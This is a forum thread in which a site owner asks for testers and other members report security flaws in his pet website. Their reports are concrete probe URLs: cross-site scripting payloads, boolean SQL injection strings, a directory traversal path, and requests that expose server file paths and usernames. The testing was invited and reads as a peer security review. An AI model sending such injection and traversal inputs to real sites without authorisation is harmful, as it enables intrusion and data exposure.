Can I get some testers for this?

[djfox]

http://www.aplaceforpets1.com/product.php?id=14

 

On my laptop, the image of the hedgehog eating will not load. Looking at the page source, it shows that the image is there and that everything is typed correctly. Does the image appear for anyone else? If so, anyone have any idea why it won`t load? (All other images on other sites load and the other images on that site load. I can`t figure out why the image won`t load on my computer.)

[Coreye]

I see the image of him eating. Anyways, here are some errors and security vulnerabilities.

 

Full Path Disclosure:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 35

 

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 36

 

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 39

 

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 40

 

[djfox]

Huh, those errors weren`t showing up at all.

 

Well, I did a bit of editing there. See if it`s better.

[Coreye]

Cross Site Scripting:

On registration you can submit ">code for the email.

 

Cross Site Scripting:

On login you can submit ">code for the username.

 

Suntax error

http://www.aplaceforpets1.com/category.php?cat=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY id DESC' at line 1

 

All usersnames say "Welcome Back, username" even though it doesn't exist.

 

Full Path Disclosure:

http://www.aplaceforpets1.com/product.php?id=a

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 11

 

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 12

 

Cross Site Scripting:

http://www.aplaceforpets1.com/category.php?cat=%22%3E%3Cmarquee%3E%3Ch1%3Evulnerable

 

Table:

Table 'aplacef3_hamburger.a' doesn't exist.

 

Cross Site Scripting:

http://www.aplaceforpets1.com/search.php?q=%3Cmarquee%3E%3Ch1%3Evulnerable&Submit=Search

[Coreye]

The verification email sends the wrong link.

 

It sent; http://www.secrettrance.net/aplaceforpets/verify_me.php?id=1d13679be8f784f15b55496548dedd3c and it should of sent; http://aplaceforpets1.com/verify_me.php?id=1d13679be8f784f15b55496548dedd3c.

[djfox]

The verification email sends the wrong link.

 

It sent; http://www.secrettrance.net/aplaceforpets/verify_me.php?id=1d13679be8f784f15b55496548dedd3c and it should of sent; http://aplaceforpets1.com/verify_me.php?id=1d13679be8f784f15b55496548dedd3c.

 

Oh shoot, thanks for letting me know about that.

 

EDIT

Ok, that should be fixed now.

[Coreye]

You can make usernames and passwords longer then the set values you have them at.

 

I just registered a really long username.

[Coreye]

To fix the image try this;

<img src='http://www.aplaceforpets1.com/upload/leah_eating.jpg' alt='leah_eating' border='0' />

[djfox]

To fix the image try this;

<img src='http://www.aplaceforpets1.com/upload/leah_eating.jpg' alt='leah_eating' border='0' />

 

It pulls the image info from a database.

[agentsteal]

Array:

http://www.aplaceforpets1.com/category.php?cat[]

 

Array:

http://www.aplaceforpets1.com/search.php?q[]

 

Array:

http://www.aplaceforpets1.com/thumbnail.php?img[]

 

Cross Site Scripting:

http://www.aplaceforpets1.com/category.php?cat=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.aplaceforpets1.com/search.php?q=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting when you register if the fields contain code.

 

Directory Transversal:

http://www.aplaceforpets1.com/thumbnail.php?img=../public_html/puppy/leah.jpg

 

Drop Down Menu:

If you edit the drop down menu on the category page you can submit arbitrary values.

 

Full Path Disclosure:

http://www.aplaceforpets1.com/category.php?offseta[]

<a href="category.php?cat=-1&offseta=

Fatal error: Unsupported operand types in /home/aplacef3/public_html/category.php on line 70

 

Full Path Disclosure:

http://www.aplaceforpets1.com/page.php

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/page.php on line 11

 

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/page.php on line 12

 

Full Path Disclosure:

http://www.aplaceforpets1.com/product.php

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 11

 

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 12

 

Warning: Division by zero in /home/aplacef3/public_html/product.php on line 49

 

Full Path Disclosure:

http://www.aplaceforpets1.com/products.php?browse[]

<a href="products.php?browse=

Fatal error: Unsupported operand types in /home/aplacef3/public_html/products.php on line 55

 

Full Path Disclosure:

http://www.aplaceforpets1.com/thumbnail.php

Warning: Division by zero in /home/aplacef3/public_html/thumbnail.php on line 10

 

Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /home/aplacef3/public_html/thumbnail.php on line 14

 

Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/aplacef3/public_html/thumbnail.php on line 17

 

Warning: imagejpeg(): supplied argument is not a valid Image resource in /home/aplacef3/public_html/thumbnail.php on line 19

 

SQL Error:

http://www.aplaceforpets1.com/category.php?cat='

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY id DESC' at line 1

 

SQL Injection:

http://www.aplaceforpets1.com/category.php?cat=1 OR 1=1

http://www.aplaceforpets1.com/category.php?cat=1 OR 1=2

 

SQL Injection:

http://www.aplaceforpets1.com/page.php?id=11 AND 1=1

http://www.aplaceforpets1.com/page.php?id=11 AND 1=2

 

SQL Injection:

http://www.aplaceforpets1.com/product.php?id=14 AND 1=1

http://www.aplaceforpets1.com/product.php?id=14 AND 1=2

 

User Enumeration:

http://www.aplaceforpets1.com/~aplacef3

 

User Enumeration:

http://www.aplaceforpets1.com/~root

[phpSensei]

didnt check if anyone posted Sql Injection

 

vulnerable

 

http://www.aplaceforpets1.com/search.php?q=<marquee><h1>PWNED%20"he%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerablello"vulnerable

[helraizer]

Login Failed. Username or password is incorrect. Try again.Welcome Back, helraizer!

Logout

 

What the heck? You put an invalid username and password in and it gives you the option to logout? How do you log out if you haven't logged in?